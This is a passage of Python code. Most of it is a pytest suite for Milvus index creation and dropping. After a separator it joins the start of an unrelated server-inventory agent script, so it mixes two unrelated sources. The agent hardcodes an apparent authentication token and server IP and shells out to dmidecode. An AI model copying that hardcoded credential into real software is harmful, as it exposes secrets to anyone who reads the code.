check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field, with the different names, num of the names equal to the maximum num supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field, with the different names, num of the names more than the maximum num supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
log.info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "FLAT", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
log.info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
metric_type=metric_type, search_params=search_param)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: return code not equals to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
target: test create index interface when there is no vectors in collection,
and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index,
add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
params, _ = gen_search_vectors_params(binary_field_name, default_binary_entities, default_top_k, nq,
search_params=search_param, metric_type="JACCARD")
log.info(params)
res = connect.search(binary_collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
***************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
expected: return code 0, and index instructure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
log.info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
log.info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
log.info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
log.info("In callback check search result")
log.info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
log.info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
log.info("before result")
res = future.result()
# TODO:
log.info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed: collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
log.info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
log.info("before result")
res = future.result()
# TODO:
log.info(res)
|
adminset_agent.py
|
#!/usr/bin/env python
# coding=utf-8
import os, re, platform, socket, time, json, threading
import psutil, schedule, requests
from subprocess import Popen, PIPE
import logging
AGENT_VERSION = "0.21"
token = 'HPcWR7l4NJNJ'
server_ip = '192.168.47.130'
def log(log_name, path=None):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y%m%d %H:%M:%S',
filename=path+log_name,
filemode='ab+')
return logging.basicConfig
log("agent.log", "/var/opt/adminset/client/")
def get_ip():
try:
hostname = socket.getfqdn(socket.gethostname())
ipaddr = socket.gethostbyname(hostname)
except Exception as msg:
print(msg)
ipaddr = ''
return ipaddr
def get_dmi():
p = Popen('dmidecode', stdout=PIPE, shell=True)
stdout, stderr = p.communicate()
return stdout
def parser_dmi(dmidata):
pd = {}
line_in = False
for line in dmidata.split('\n'):
if line.startswith('System Information'):
line_in = True
continue
if line.startswith('\t') and line_in:
k,v = [i.strip() for i in line.split(':')]
pd[k] = v
else:
line_in = False
return pd
def get_mem_total():
cmd = "grep MemTotal /proc/meminfo"
p = Popen(cmd, stdout=PIPE, shell = True)
